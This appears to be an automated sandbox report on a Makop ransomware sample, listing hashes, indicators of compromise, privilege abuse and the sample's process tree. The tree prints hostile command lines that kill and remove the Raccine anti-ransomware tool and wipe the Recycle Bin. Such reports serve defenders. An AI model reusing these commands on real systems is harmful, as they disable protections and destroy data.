Overview
overview
10Static
static
100033c6e1db...le.exe
windows7_x64
100033c6e1db...le.exe
windows10_x64
1002665fcf9c...le.exe
windows7_x64
1002665fcf9c...le.exe
windows10_x64
101c4b55fefc...le.exe
windows7_x64
101c4b55fefc...le.exe
windows10_x64
1048be948c33...le.exe
windows7_x64
1048be948c33...le.exe
windows10_x64
10714f630043...le.exe
windows7_x64
10714f630043...le.exe
windows10_x64
107932343454...le.exe
windows7_x64
107932343454...le.exe
windows10_x64
10aa3e530d45...le.exe
windows7_x64
8aa3e530d45...le.exe
windows10_x64
10b6f774f469...le.exe
windows7_x64
10b6f774f469...le.exe
windows10_x64
10b739791dd0...le.exe
windows7_x64
10b739791dd0...le.exe
windows10_x64
10d6cb46d0b3...le.exe
windows7_x64
10d6cb46d0b3...le.exe
windows10_x64
10e1c46a96ef...le.exe
windows7_x64
10e1c46a96ef...le.exe
windows10_x64
10Analysis
-
max time kernel
38s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
Static task
static1
Behavioral task
behavioral1
Sample
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral8
Sample
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral10
Sample
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral22
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Resource
win10v20210408
General
-
Target
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
-
Size
107KB
-
MD5
ffd507c308ffa09e21aa937bc631421a
-
SHA1
7938ce37df604cf807e9d2767acf33984a1776a3
-
SHA256
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409
-
SHA512
b48721c1e57152afe16576e7f54084e52d88d594c12203e5e56316bca8a7bc44c29b790e2e358ab0b7220b2d6e098a288b0fa602af84dda9cef16104f72d2970
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
makop
Signatures
-
Makop
Ransomware family discovered by @VK_Intel in early 2020.
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe -
Modifies file permissions 1 TTPs 6 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2416 icacls.exe 2648 icacls.exe 3720 icacls.exe 3400 icacls.exe 3372 icacls.exe 4240 icacls.exe -
Drops file in Windows directory 10 IoCs
Processes:
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exedescription ioc process File opened for modification C:\Windows\setupact.log.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\WindowsShell.Manifest 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\WindowsUpdate.log.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File created C:\Windows\bootstat.dat.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\DtcInstall.log.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\lsasetup.log.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\PFRO.log.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\Professional.xml.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\system.ini.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe File opened for modification C:\Windows\win.ini.[ID-A2C56C1C].9ten0p 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3136 taskkill.exe 4424 taskkill.exe 6124 taskkill.exe 6020 taskkill.exe 6108 taskkill.exe 5172 taskkill.exe 3904 taskkill.exe 3576 taskkill.exe 3944 taskkill.exe 1768 taskkill.exe 5336 taskkill.exe 4952 taskkill.exe 4764 taskkill.exe 3936 taskkill.exe 1192 taskkill.exe 4888 taskkill.exe 4532 taskkill.exe 3636 taskkill.exe 3876 taskkill.exe 3044 taskkill.exe 4856 taskkill.exe 5316 taskkill.exe 2168 taskkill.exe 3828 taskkill.exe 1580 taskkill.exe 5520 taskkill.exe 5772 taskkill.exe 5532 taskkill.exe 1520 taskkill.exe 1280 taskkill.exe 2268 taskkill.exe 384 taskkill.exe 5460 taskkill.exe 5372 taskkill.exe 800 taskkill.exe 2152 taskkill.exe 5444 taskkill.exe 4232 taskkill.exe 3332 taskkill.exe 3932 taskkill.exe 3936 taskkill.exe 4960 taskkill.exe 5400 taskkill.exe 5824 taskkill.exe 4976 taskkill.exe 2136 taskkill.exe 3968 taskkill.exe 3196 taskkill.exe 2784 taskkill.exe 3480 taskkill.exe 5612 taskkill.exe 4896 taskkill.exe 3868 taskkill.exe 6092 taskkill.exe 5436 taskkill.exe 4264 taskkill.exe 1652 taskkill.exe 3196 taskkill.exe 2208 taskkill.exe 1232 taskkill.exe 4504 taskkill.exe 5592 taskkill.exe 5652 taskkill.exe 4008 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exepid process 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenet.exetaskkill.exeConhost.exetaskkill.exeConhost.exeConhost.exeConhost.exewmiprvse.exetaskkill.exeConhost.exetaskkill.exeConhost.exenet.exetaskkill.exeConhost.exenet.exenet.exenet.exeConhost.exenet.exeSLUI.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exenet.exetaskkill.exeConhost.exenet.exenet.exeConhost.exetaskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Token: SeDebugPrivilege 1432 taskkill.exe Token: SeDebugPrivilege 3636 taskkill.exe Token: SeDebugPrivilege 1280 taskkill.exe Token: SeDebugPrivilege 3936 taskkill.exe Token: SeDebugPrivilege 3172 taskkill.exe Token: SeDebugPrivilege 2136 net.exe Token: SeDebugPrivilege 2168 taskkill.exe Token: SeDebugPrivilege 1652 Conhost.exe Token: SeDebugPrivilege 3860 taskkill.exe Token: SeDebugPrivilege 3904 Conhost.exe Token: SeDebugPrivilege 3968 Conhost.exe Token: SeDebugPrivilege 3196 Conhost.exe Token: SeDebugPrivilege 1232 wmiprvse.exe Token: SeDebugPrivilege 740 taskkill.exe Token: SeDebugPrivilege 3964 Conhost.exe Token: SeDebugPrivilege 1092 taskkill.exe Token: SeDebugPrivilege 3332 Conhost.exe Token: SeDebugPrivilege 2836 net.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 4008 Conhost.exe Token: SeDebugPrivilege 3136 net.exe Token: SeDebugPrivilege 3576 net.exe Token: SeDebugPrivilege 3196 Conhost.exe Token: SeDebugPrivilege 2100 net.exe Token: SeDebugPrivilege 3932 Conhost.exe Token: SeDebugPrivilege 2736 net.exe Token: SeDebugPrivilege 3828 SLUI.exe Token: SeDebugPrivilege 3480 taskkill.exe Token: SeDebugPrivilege 3944 Conhost.exe Token: SeDebugPrivilege 3928 taskkill.exe Token: SeDebugPrivilege 3936 taskkill.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 1192 Conhost.exe Token: SeDebugPrivilege 2152 taskkill.exe Token: SeDebugPrivilege 1232 wmiprvse.exe Token: SeDebugPrivilege 3876 taskkill.exe Token: SeDebugPrivilege 1792 Conhost.exe Token: SeDebugPrivilege 2268 net.exe Token: SeDebugPrivilege 384 taskkill.exe Token: SeDebugPrivilege 3944 Conhost.exe Token: SeDebugPrivilege 3480 taskkill.exe Token: SeDebugPrivilege 2700 Conhost.exe Token: SeDebugPrivilege 2712 net.exe Token: SeDebugPrivilege 1580 net.exe Token: SeDebugPrivilege 3044 Conhost.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 1652 Conhost.exe Token: SeDebugPrivilege 1076 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exepid process 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exepid process 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exedescription pid process target process PID 1744 wrote to memory of 1432 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 1432 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 1432 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3480 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe reg.exe PID 1744 wrote to memory of 3480 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe reg.exe PID 1744 wrote to memory of 3480 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe reg.exe PID 1744 wrote to memory of 3332 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe reg.exe PID 1744 wrote to memory of 3332 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe reg.exe PID 1744 wrote to memory of 3332 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe reg.exe PID 1744 wrote to memory of 3132 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe schtasks.exe PID 1744 wrote to memory of 3132 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe schtasks.exe PID 1744 wrote to memory of 3132 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe schtasks.exe PID 1744 wrote to memory of 4040 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe cmd.exe PID 1744 wrote to memory of 4040 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe cmd.exe PID 1744 wrote to memory of 4040 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe cmd.exe PID 1744 wrote to memory of 424 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe netsh.exe PID 1744 wrote to memory of 424 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe netsh.exe PID 1744 wrote to memory of 424 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe netsh.exe PID 1744 wrote to memory of 3872 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3872 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3872 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 1768 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 1768 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 1768 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 1956 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 1956 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 1956 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 2452 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe cmd.exe PID 1744 wrote to memory of 2452 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe cmd.exe PID 1744 wrote to memory of 2452 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe cmd.exe PID 1744 wrote to memory of 1348 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe sc.exe PID 1744 wrote to memory of 1348 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe sc.exe PID 1744 wrote to memory of 1348 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe sc.exe PID 1744 wrote to memory of 804 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe sc.exe PID 1744 wrote to memory of 804 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe sc.exe PID 1744 wrote to memory of 804 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe sc.exe PID 1744 wrote to memory of 3860 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3860 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3860 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 2704 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe netsh.exe PID 1744 wrote to memory of 2704 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe netsh.exe PID 1744 wrote to memory of 2704 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe netsh.exe PID 1744 wrote to memory of 3904 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3904 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3904 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3972 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3972 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3972 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe Conhost.exe PID 1744 wrote to memory of 3636 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3636 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3636 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 1280 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 1280 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 1280 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3936 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3936 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3936 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3172 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3172 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 3172 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 2136 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 2136 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 2136 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe PID 1744 wrote to memory of 2168 1744 714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"1⤵
- Drops startup file
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:3332
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:3132
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:4040
-
-
